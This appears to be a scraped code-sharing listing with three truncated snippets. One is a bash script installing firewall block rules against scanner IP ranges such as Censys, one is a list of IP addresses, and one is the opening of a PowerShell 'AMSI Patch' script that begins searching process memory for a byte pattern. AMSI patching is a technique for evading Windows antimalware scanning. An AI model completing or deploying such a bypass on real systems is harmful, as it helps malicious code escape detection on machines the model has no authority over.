This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "[+] Installing scanners block rules with logging..." | |
| LOGTAG="SCANNERS_BLOCK" | |
| ######################################## | |
| # Censys IPv4 ranges | |
| ######################################## | |
| CENSYS_V4=( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 104.244.72.115 | |
| 104.244.74.211 | |
| 104.244.74.57 | |
| 104.244.76.170 | |
| 107.189.1.160 | |
| 107.189.1.178 | |
| 107.189.11.153 | |
| 107.189.12.135 | |
| 107.189.14.98 | |
| 107.189.29.107 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host "-- AMSI Patch" | |
| Write-Host "-- Modified By: Shantanu Khandelwal (@shantanukhande)" | |
| Write-Host "-- Original Author: Paul Laîné (@am0nsec)" | |
| Write-Host "" | |
| Class Hunter { | |
| static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) { | |
| while ($true) { | |
| [int]$count = 0 |